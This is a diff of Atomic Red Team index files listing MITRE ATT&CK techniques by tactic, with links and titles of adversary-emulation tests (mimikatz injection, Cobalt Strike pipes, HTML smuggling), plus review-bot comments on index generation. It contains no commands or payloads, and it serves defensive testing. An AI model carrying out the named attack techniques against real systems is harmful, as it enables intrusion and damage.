- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# discovery
+- T1033 System Owner/User Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016.001 System Network Configuration Discovery: Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.001 Account Discovery: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.001 Virtualization/Sandbox Evasion: System Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1135 Network Share Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1082 System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1217 Browser Bookmark Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016 System Network Configuration Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1482 Domain Trust Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1083 File and Directory Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1049 System Network Connections Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1057 Process Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1069.001 Permission Groups Discovery: Local Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1201 Password Policy Discovery](../../T1201/T1201.md)
+ - Atomic Test #12: Examine AWS Password Policy [iaas:aws]
+- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1012 Query Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1018 Remote System Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1046 Network Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1124 System Time Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
+- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1489 Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.002 Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #4: GCP - Delete Bucket [iaas:gcp]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# discovery
-- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1082 System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md)
- - Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos, iaas:aws]
- - Atomic Test #2: AWS - EC2 Security Group Enumeration [iaas:aws]
-- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1049 System Network Connections Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
- - Atomic Test #1: AWS S3 Enumeration [iaas:aws]
-- T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- - Atomic Test #12: Examine AWS Password Policy [iaas:aws]
-- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1526 Cloud Service Discovery](../../T1526/T1526.md)
- - Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
-- T1046 Network Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# persistence
-- T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
-- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
- - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
-- [T1098 Account Manipulation](../../T1098/T1098.md)
- - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
- - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
- - Atomic Test #17: GCP - Delete Service Account Key [iaas:gcp]
-- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
-- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# privilege-escalation
-- T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1548.005 Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
-- [T1098 Account Manipulation](../../T1098/T1098.md)
- - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
- - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
- - Atomic Test #17: GCP - Delete Service Account Key [iaas:gcp]
-- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
-
-# collection
-- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
- - Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
- - Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
- - Atomic Test #3: AWS - Scan for Anonymous Access to S3 [iaas:aws]
-- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1529 System Shutdown/Reboot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
+- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- - Atomic Test #3: GCP - Create Custom IAM Role [iaas:gcp]
-
-# lateral-movement
-- T1021.008 Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# execution
-- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204.003 User Execution: Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1651 Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# exfiltration
-- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.004 Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
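Review bot: The platform filter behind this index looks wrong rather than the content having changed. The `-# execution` line removes the entire execution section, including the cloud-native entries T1059.009 Cloud API, T1651 Cloud Administration Command and T1648 Serverless Execution, and the exfiltration section loses T1537 Transfer Data to Cloud Account while gaining physical-medium techniques (T1011.001 Exfiltration Over Bluetooth, T1052.001 Exfiltration over USB, T1052 Exfiltration Over Physical Medium) that make no sense in an index whose removed entries were all cloud-oriented. The seven added lines just above `# exfiltration` (T1566.004, T1195.002, T1078.002, T1200, T1189, T1566.003, T1078.003) are all initial-access techniques but carry no tactic heading of their own in this hunk, so they land under whatever section precedes them; check the generator's platform-to-tactic mapping and regenerate. Minor: the T1048 sub-technique names are formatted three different ways ("Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric ..." with a dash, "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted ..." with a colon, and T1048.001 with no parent prefix at all).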
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 6a22d25fc7..4f9de40df4 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -48,6 +48,7 @@
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1006 Direct Volume Access](../../T1006/T1006.md)
- Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
+- T1666 Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.008 Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md)
- Atomic Test #1: New-Inbox Rule to Hide E-mail in M365 [azure-ad]
- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
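Review bot: The T1666 addition fits its neighbours (T1574.007, T1006, T1564.008 and T1027.013 are all defense-evasion techniques), but the visible context shows the index is not sorted by technique ID, which is why every regeneration of index.md produces scattered one-line hunks like this one across the whole file. Emitting entries sorted by ID within each tactic would make these index diffs reviewable and would make accidental duplicates obvious.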
@@ -278,6 +279,7 @@
- Atomic Test #10: Event Log Manipulations- Time slipping via Powershell [windows]
- [T1620 Reflective Code Loading](../../T1620/T1620.md)
- Atomic Test #1: WinPwn - Reflectively load Mimik@tz into memory [windows]
+- T1480.002 Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.011 Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.003 Time Based Evasion](../../T1497.003/T1497.003.md)
- Atomic Test #1: Delay execution with ping [linux, macos]
@@ -665,6 +667,7 @@
- Atomic Test #1: Register Portable Virtualbox [windows]
- Atomic Test #2: Create and start VirtualBox virtual machine [windows]
- Atomic Test #3: Create and start Hyper-V virtual machine [windows]
+- T1027.014 Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -734,11 +737,14 @@
- Atomic Test #1: Hidden Window [windows]
- Atomic Test #2: Headless Browser Accessing Mockbin [windows]
- Atomic Test #3: Hidden Window-Conhost Execution [windows]
+- T1127.002 ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
@@ -948,6 +954,7 @@
- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.006 Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
@@ -1223,6 +1230,7 @@
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
+- T1546.017 Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1378,6 +1386,7 @@
- Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
- Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
- Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
+- T1059.011 Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1204.003 User Execution: Malicious Image](../../T1204.003/T1204.003.md)
- Atomic Test #1: Malicious Execution from Mounted ISO Image [windows]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1506,6 +1515,7 @@
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
